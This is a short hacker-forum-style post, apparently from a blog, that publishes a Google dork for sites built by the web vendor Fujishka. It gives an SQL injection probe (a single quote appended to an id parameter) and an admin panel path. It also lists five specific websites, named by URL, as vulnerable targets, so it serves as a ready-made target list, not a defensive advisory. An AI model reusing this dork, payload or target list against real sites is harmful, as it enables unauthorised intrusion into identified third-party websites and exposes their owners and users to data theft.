Latest Tweets

Dork Sql injection #2

Dork Sql injection :


=============================================================== # Title : Created by Fujishka sql injection Vulnerability # Author : Dj3Bb4rAn0n Fb.com/djebbar.bassem.16 # Date : /02/04/2019/ # Home : Annaba ( Algeria ) # Tested on : Linux ( backbox ) # Vendor : http://fujishka.com/ # Dork : intext:"Created by Fujishka" =============================================================== PoC : Admin panel path : [ YOUR TARGET ]/admin/ Example : http://greenmountainresorts.in/admin/ [ + ] Search in google using this dork : | intext:"Created by Fujishka" | or this dork : | "php?id" intext:"Created by Fujishka" | [ + ] payload : ' Example : http://greenmountainresorts.in/room-details.php?id=18' ######################################################################################## Example of vulnerable sites : [ + ] http://indat.co.in/service-details.php?id=11 [ + ] http://www.newleafedakkara.com/news-details.php?id=18 [ + ] http://cortexpaincare.com/contreatment-details.php?id=13 [ + ] http://laptoplab.in/news-details.php?id=23 [ + ] greenmountainresorts.in/room-details.php?id=18 ========================================================================================== ####### Greetz to ######## Lakarha_23 | mohammed xdz pazzo | Jag ar

  • ---------------------------------
=Sql injection Dork Version 1 :

Previous
Next Post »
'; (function() { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })();